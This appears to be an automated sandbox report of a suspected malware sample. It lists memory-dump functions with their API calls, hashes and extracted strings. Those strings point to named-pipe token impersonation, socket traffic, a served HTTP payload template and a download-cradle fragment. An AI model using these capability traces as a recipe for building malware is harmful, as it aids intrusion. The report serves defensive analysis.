                          • Part of subcall function 00A3C444: malloc.LIBCMT ref: 00A3C457
                        • fclose.LIBCMT ref: 00A40C45
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                        • String ID: mode
                        • API String ID: 1756087678-2976727214
                        • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                        • Instruction ID: 5792545f95e4b8d1fe99ad970e120a4711b1396ba82296db59d93f6b7611c43a
                        • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                        • Instruction Fuzzy Hash: 1841122630468082DB44EB22E96576EB352F7C9BD0F808225FE5E4BB96DF3CC505CB01
                        Function 00A48620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A4864F
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                        • _snprintf.LIBCMT ref: 00A48667
                          • Part of subcall function 00A4EA3C: _errno.LIBCMT ref: 00A4EA73
                          • Part of subcall function 00A4EA3C: _invalid_parameter_noinfo.LIBCMT ref: 00A4EA7E
                        • free.LIBCMT ref: 00A4867E
                          • Part of subcall function 00A4E644: _errno.LIBCMT ref: 00A4E664
                        • malloc.LIBCMT ref: 00A486CE
                        • _snprintf.LIBCMT ref: 00A486E6
                        • free.LIBCMT ref: 00A4870E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                        • String ID: /'); %s
                        • API String ID: 761449704-1283008465
                        • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                        • Instruction ID: af1624884052e258f1b996bb5d8723498894bad5224ba11995aed9b869cb99bd
                        • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                        • Instruction Fuzzy Hash: 0A31D0293006C185DA199B627A253A9BF62B7CAFD0F9C4111DEE607BA5CF3DC452D304
                        Function 00CFE98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$OpenProcessToken
                        • String ID:
                        • API String ID: 2009710997-0
                        • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                        • Instruction ID: 816c5dd8bc26b00bf7ec11c88bce0800459619779c92f8bf19d8cb2ca2349885
                        • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                        • Instruction Fuzzy Hash: 8921D63130470486EB50AFA3E89477A6BA1EBC8BD4F144039EF5A43725DE3DC545EB51
                        Function 00A4F210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A4F236
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A4F242
                        • __crtIsPackagedApp.LIBCMT ref: 00A4F253
                        • _dosmaperr.LIBCMT ref: 00A4F29D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 2917016420-0
                        • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                        • Instruction ID: e59b634a9549284b6ef24b9115ed70a27c505078ba652108e442382358dcdd39
                        • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                        • Instruction Fuzzy Hash: 5B21E03A700B418AEB10AF66E805329AAE1FBCABA5F1806249E4943795DFBCC4448701
                        Function 00D0FBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D0FC04
                          • Part of subcall function 00D01600: _getptd.LIBCMT ref: 00D01616
                          • Part of subcall function 00D01600: __updatetlocinfo.LIBCMT ref: 00D0164B
                          • Part of subcall function 00D01600: __updatetmbcinfo.LIBCMT ref: 00D01672
                        • _errno.LIBCMT ref: 00D0FC1F
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D0FC2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 3191669884-0
                        • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                        • Instruction ID: 4094a4d3fc5ff93d1a480ea5a756f99b092951567aac74a6d9741c2822f42928
                        • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                        • Instruction Fuzzy Hash: 09217A723047888AE7219F12D4857AEB6A4F785BE4F684135EF9C07B95CB78D881CB24
                        Function 00A5EFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A5F004
                          • Part of subcall function 00A50A00: _getptd.LIBCMT ref: 00A50A16
                          • Part of subcall function 00A50A00: __updatetlocinfo.LIBCMT ref: 00A50A4B
                          • Part of subcall function 00A50A00: __updatetmbcinfo.LIBCMT ref: 00A50A72
                        • _errno.LIBCMT ref: 00A5F01F
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A5F02A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 3191669884-0
                        • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                        • Instruction ID: e559d319074356bed04b76843d7ad68904a8a5eea8b6f5ded6ae011a0b575c88
                        • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                        • Instruction Fuzzy Hash: 8221B2723047848EDB109F11D584A6DB7A5F798FE2F588236EF9847B86DB74C949CB00
                        Function 00CF596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTickioctlsocket
                        • String ID:
                        • API String ID: 3686034022-0
                        • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                        • Instruction ID: 1c119914f86daf141c70482b34aa297fb18585952ca51038acffd86ae6e62cb7
                        • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                        • Instruction Fuzzy Hash: 7F112931300E8497E7148BE9E8443BDB361E784BB4F500225DB5986AA0DFBECD9AC721
                        Function 00CF0AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                        • String ID:
                        • API String ID: 4232080776-0
                        • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                        • Instruction ID: ad17a2dcae4779f98a7e66956e0394eb0c27beffa0cfe36a92b7ee35aa5ce96e
                        • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                        • Instruction Fuzzy Hash: 2511A331710648A6F791DBA1EC44BBA3371FB98F45F944217E90A42565CF7CC548C736
                        Function 00D00B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                        • String ID:
                        • API String ID: 2328795619-0
                        • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                        • Instruction ID: c1ea8aa4ae9254cba09cc805bf8aa09bfaffb00aa45eddf3319ba65991f2891b
                        • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                        • Instruction Fuzzy Hash: 67515A31704750A6EB188A67A50076ABE90F794BF8F1C4724AE7D43FD4CB38D4918770
                        Function 00A4FF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                        • String ID:
                        • API String ID: 2328795619-0
                        • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                        • Instruction ID: a8ef089c8614d0b51c972a03b351f32c391c91440db602dc6602844fd76900ae
                        • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                        • Instruction Fuzzy Hash: 695178317047508BDB188B269A00B6AB6A0B795BF5F189735AE3943FD5CB38C89DC340
                        Function 00A41030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A41063
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E6FD
                          • Part of subcall function 00A4E684: _errno.LIBCMT ref: 00A4E708
                          • Part of subcall function 00A3C444: malloc.LIBCMT ref: 00A3C457
                        • free.LIBCMT ref: 00A4115E
                        • free.LIBCMT ref: 00A4116B
                          • Part of subcall function 00A4E644: _errno.LIBCMT ref: 00A4E664
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$freemalloc$_callnewh
                        • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                        • API String ID: 2029259483-317027030
                        • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                        • Instruction ID: 7cb2af6dd26283f416851a67329a5e638fa207dc7cd72f7068b6351c7bcb4ded
                        • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                        • Instruction Fuzzy Hash: 4551CE7670879086DB10DF62E8417AEB7A2F3C5B94F440016EE4A43B59EF7CC609CB40
                        Function 00CF1694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00CF5FEC: malloc.LIBCMT ref: 00CF6008
                          • Part of subcall function 00D00620: _errno.LIBCMT ref: 00D00577
                          • Part of subcall function 00D00620: _invalid_parameter_noinfo.LIBCMT ref: 00D00582
                        • fseek.LIBCMT ref: 00CF1730
                          • Part of subcall function 00D00EA4: _errno.LIBCMT ref: 00D00ECC
                          • Part of subcall function 00D00EA4: _invalid_parameter_noinfo.LIBCMT ref: 00D00ED7
                        • _ftelli64.LIBCMT ref: 00CF1738
                          • Part of subcall function 00D00F18: _errno.LIBCMT ref: 00D00F36
                          • Part of subcall function 00D00F18: _invalid_parameter_noinfo.LIBCMT ref: 00D00F41
                        • fseek.LIBCMT ref: 00CF1748
                          • Part of subcall function 00D00EA4: _fseek_nolock.LIBCMT ref: 00D00EF5
                        • GetFullPathNameA.KERNEL32 ref: 00CF176B
                        • malloc.LIBCMT ref: 00CF1788
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                          • Part of subcall function 00CED044: malloc.LIBCMT ref: 00CED057
                          • Part of subcall function 00CED074: htonl.WS2_32 ref: 00CED07F
                        • fclose.LIBCMT ref: 00CF1845
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                        • String ID:
                        • API String ID: 3587854850-0
                        • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                        • Instruction ID: 9972f0a17a4155b71b8a986079a3af51fc7cbd92c9df9cda01c89b0850d3f99a
                        • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                        • Instruction Fuzzy Hash: BE41E02230068492DB40EB22E8647BEA751FBD8BD0F848226EF5E47B96DF3CC506C701
                        Function 00CF5C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetACP.KERNEL32 ref: 00CF5C78
                        • GetOEMCP.KERNEL32 ref: 00CF5C82
                        • GetCurrentProcessId.KERNEL32 ref: 00CF5CA8
                        • GetTickCount.KERNEL32 ref: 00CF5CB0
                          • Part of subcall function 00D0044C: _getptd.LIBCMT ref: 00D00454
                        • GetCurrentProcess.KERNEL32 ref: 00CF5CEC
                          • Part of subcall function 00CF0C64: GetModuleHandleA.KERNEL32 ref: 00CF0C79
                          • Part of subcall function 00CF0C64: GetProcAddress.KERNEL32 ref: 00CF0C89
                        • GetCurrentProcessId.KERNEL32 ref: 00CF5D5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                        • String ID:
                        • API String ID: 3426420785-0
                        • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                        • Instruction ID: d75309a62c967db3d2ced4382538c3de25419148d636ecaa414db2b0d62c8cc0
                        • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                        • Instruction Fuzzy Hash: 1C41C232710755A5EF00EBB2DC857AD23B5BB88784F400416EF0947669EF39C10AD761
                        Function 00CF6F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CF6F5E
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • htonl.WS2_32 ref: 00CF6F91
                        • recvfrom.WS2_32 ref: 00CF6FD5
                        • WSAGetLastError.WS2_32 ref: 00CF6FE2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                        • String ID:
                        • API String ID: 2310505145-0
                        • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                        • Instruction ID: 67f82e5a7e9b67e130c8077b18c3ba75790e593c6cfc28d8c89d6343afd602b1
                        • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                        • Instruction Fuzzy Hash: D841D232204A84C2EB509F65E84473A7771FB98BA8F144226EB9D47768DF39C592CB12
                        Function 00CF79C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                        • String ID:
                        • API String ID: 1014270282-0
                        • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                        • Instruction ID: e5b645028ef9584a42bcad20efbe3eca39a5773e1ce4f828d71baeae9e49f05e
                        • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                        • Instruction Fuzzy Hash: 99318D3231878886EB50DF52D8443AD77A1F789BD8F084629EB4943B58DF7CC6059B11
                        Function 00D00620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                        • String ID:
                        • API String ID: 1547050394-0
                        • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                        • Instruction ID: f35b7b0dade294feceaccc896f41fec81fb6c2c6c27181d70ab5e9977cbf1721
                        • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                        • Instruction Fuzzy Hash: DE112B61708782A6EB119F22AC0532EAA95FB49BC0F484421AECD97B95DF7CC4109F30
                        Function 00A4FA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                        • String ID:
                        • API String ID: 1547050394-0
                        • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                        • Instruction ID: c1e6709420c3ce0de1e4e03a5ac0113a1b519e64a1440a22bdde11d63f3b37a9
                        • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                        • Instruction Fuzzy Hash: 43112B35314B8299DB115F32AD0132EB6A1BBC9BC0F446431EE8D97B56EF3CC4408700
                        Function 00A59B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                        • String ID:
                        • API String ID: 2102446242-0
                        • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                        • Instruction ID: eb2d7e8ee6dcb5044ee72dec93f47a9f8ac4046ee5b1bde62912abb55b1c60ab
                        • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                        • Instruction Fuzzy Hash: 3411E231300B81C5EB056F69E99133E6A65BB817A2F5A422CEE1A4F392DB78C849C715
                        Function 00CEFC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CEFC85
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • free.LIBCMT ref: 00CEFCC0
                        • fwrite.LIBCMT ref: 00CEFD01
                        • fclose.LIBCMT ref: 00CEFD09
                        • free.LIBCMT ref: 00CEFD16
                          • Part of subcall function 00CFF244: HeapFree.KERNEL32 ref: 00CFF25A
                          • Part of subcall function 00CFF244: _errno.LIBCMT ref: 00CFF264
                          • Part of subcall function 00CFF244: GetLastError.KERNEL32 ref: 00CFF26C
                        • GetLastError.KERNEL32 ref: 00CEFD1B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                        • String ID:
                        • API String ID: 1616846154-0
                        • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                        • Instruction ID: 4a967231e99b413d1ec4199bfb147fe412170afc2a88e3db4e5ca9362211562e
                        • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                        • Instruction Fuzzy Hash: 8911C46130478441DA10EB23A45137EA791EBC5FE4F544239EFAD4BB8ADE2DC6028791
                        Function 00CF4488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                        • String ID:
                        • API String ID: 3798860377-0
                        • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                        • Instruction ID: 9a0fa2a4765654ac6eea1d0d0bc8175e71279028bc1ce0814cb8716d4bccc1ff
                        • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                        • Instruction Fuzzy Hash: 6511013230474493FB54AB61F51873E2361F784BA4F404212EB6A47B94CF7DC4958B12
                        Function 00CFEFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00CFF00F
                          • Part of subcall function 00CFF284: _FF_MSGBANNER.LIBCMT ref: 00CFF2B4
                          • Part of subcall function 00CFF284: _NMSG_WRITE.LIBCMT ref: 00CFF2BE
                          • Part of subcall function 00CFF284: HeapAlloc.KERNEL32 ref: 00CFF2D9
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF2F2
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF2FD
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF308
                        • malloc.LIBCMT ref: 00CFF01D
                          • Part of subcall function 00CFF284: _callnewh.LIBCMT ref: 00CFF318
                          • Part of subcall function 00CFF284: _errno.LIBCMT ref: 00CFF31D
                        • malloc.LIBCMT ref: 00CFF03F
                        • _snprintf.LIBCMT ref: 00CFF05A
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                        • malloc.LIBCMT ref: 00CFF075
                        Strings
                        • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 00CFF044
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                        • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                        • API String ID: 3518644649-2739389480
                        • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                        • Instruction ID: fe396bd12a2e989add541c25bb97172eaf9af5c03cd34e9ab9f067b7f1a305a6
                        • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                        • Instruction Fuzzy Hash: 4101D231701B9842DA84DB52B8447297699FB8CFE0F14422EEFA9477C5CF78C042C780
                        Function 00A4E3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • malloc.LIBCMT ref: 00A4E40F
                          • Part of subcall function 00A4E684: _FF_MSGBANNER.LIBCMT ref: 00A4E6B4
                          • Part of subcall function 00A4E684: _NMSG_WRITE.LIBCMT ref: 00A4E6BE
                          • Part of subcall function 00A4E684: _callnewh.LIBCMT ref: 00A4E6F2
